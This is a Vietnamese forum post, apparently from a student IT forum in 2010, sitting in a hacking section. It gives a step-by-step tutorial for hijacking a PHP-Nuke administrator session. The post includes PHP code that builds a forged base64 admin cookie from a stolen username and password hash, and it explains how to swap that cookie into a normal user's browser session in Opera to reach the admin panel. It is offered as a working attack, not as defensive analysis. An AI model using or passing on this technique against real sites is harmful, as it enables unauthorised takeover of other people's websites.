»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-»

.:hix lâu không làm web.nên giờ lười làm quá.dùng tạm cái Forum việt vậy.chủ yếu là chất lượng Những bài viết thôi đúng không.thật THà là nói hết không giấu diếm nhưng học xong cấm nghịch bậy..http://guichonguoiay.net.tf web mình đó RỖI VÀO CHơi Ha.hjhj:.
 
Trang ChínhPortalCalendarGalleryTrợ giúpTìm kiếmThành viênNhómĐăng kýĐăng Nhập
Thông Tin Cực Sock Cho Những Ai Nghiện Game Audition Của Thái Nguyên.Sau Một Thời Gian Tìm Hiểu Mà Nhờ Mấy Anh Ở forum ClbGame Mình Đã Cài THành Công Bản Audition Offline THái Nguyên.Sắp Tới Mình Sẽ Đưa Lên Online.Các Bạn Muốn Chơi Game Và Muốn Sở Hữu Những Bộ Đồ Đẹp Nhất Không Còn Chần Chừ Gì Nữa Mà Không Click Chuột Để Truy Cập Trang Web wWw.AuTn.tk Để Download Và Thưởng thức

Share | 
 

 Hướng dẫn fake cookie cho PHP-Nuke

Go down 
Tác giảThông điệp
Admin
Admin


Tổng số bài gửi : 136
Join date : 13/03/2010

Bài gửiTiêu đề: Hướng dẫn fake cookie cho PHP-Nuke   Tue Mar 16, 2010 9:15 pm

Hướng dẫn fake cookie cho PHP-Nuke


--------------------------------------------------------------------------------

Sau khi có được passhash của thằng admin việc cần phải làm lúc này là làm sao login vào trang quản lý của nó. Chúng ta có thể crack pass của nó nhưng mà cách này mang tính hên xui và khả năng thành công hơi thấp vì vậy fake cookie có vẻ khả quan hơn.
Bây giờ xem qua đoạn code tạo cookie cho thằng admin, nó như thế này đây:

$admin = base64_encode("$aid:$pwd:$admlanguage");
setcookie("admin","$admin",time()+2592000);

Nó dùng base64_encode. OK chúng ta sẽ dùng code sau để tạo cookie:

$aid = "xavuong"; //cái này là user của admin
$pwd = "839361742baa800c3d4eb295a6b69c6d"; //còn cái này là passhash
$admlanguage = ""; //cái này tùy thuộc vào column admlanguage trong db, thông thường thì chẳng có gì
$xv = base64_encode("$aid:$pwd:$admlanguage");
echo "$xv";

Sau khi chạy code trên nó ra thế này:

eGF2dW9uZzo4MzkzNjE3NDJiYWE4MDBjM2Q0ZWIyOTVhNmI2OW M2ZDo=

Bây giờ chúng ta sẽ bỏ dấu = ở đằng sau đi và thêm vào đó %3D nó sẽ thành thế này

eGF2dW9uZzo4MzkzNjE3NDJiYWE4MDBjM2Q0ZWIyOTVhNmI2OW M2ZDo%3D

Việc chuẩn bị xong rùi, bây giờ mở Opera ra, vào trang của nó đăng ký 1 cái nick rùi login vào nó sẽ tạo cho mình cái cookie có dạng:

nuke lang: english
nuke user: MzpjdW9uZ3Bob25nOjIzZjQ3NGFlZng5NWZhOWYxMGI5ZTViYj VhYjgwNGQ1OjEwOjowOjA6MDowOjo0MDk2

Việc tiếp theo vào Tool - Advanced - Cookies chọn cái tên site của nó rùi chọn cái nuke user rùi chọn tiếp edit. Sửa cái user thành admin và sửa cái MzpjdW9uZ3Bob25nOjIzZjQ3NGFlZng5NWZhOWYxMGI5ZTViYj VhYjgwNGQ1OjEwOjowOjA6MDowOjo0MDk2 thành cái mà chúng ta đã tạo ở trên eGF2dW9uZzo4MzkzNjE3NDJiYWE4MDBjM2Q0ZWIyOTVhNmI2OW M2ZDo%3D. Mọi việc đã xong chỉ cần chạy link admin là bạn có thể vào trang quản lý của nó.



Longnhi(HCE)
Về Đầu Trang Go down
Xem lý lịch thành viên http://itcu.forumvi.com
 
Hướng dẫn fake cookie cho PHP-Nuke
Về Đầu Trang 
Trang 1 trong tổng số 1 trang

Permissions in this forum:Bạn không có quyền trả lời bài viết
»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-» :: Phận Làm Trai Gõ Phím Bình Thiên Hạ--Chí Anh Hùng Click Chuột Định Giang Sơn :: Những điều cơ bản để hack một trang web-
Chuyển đến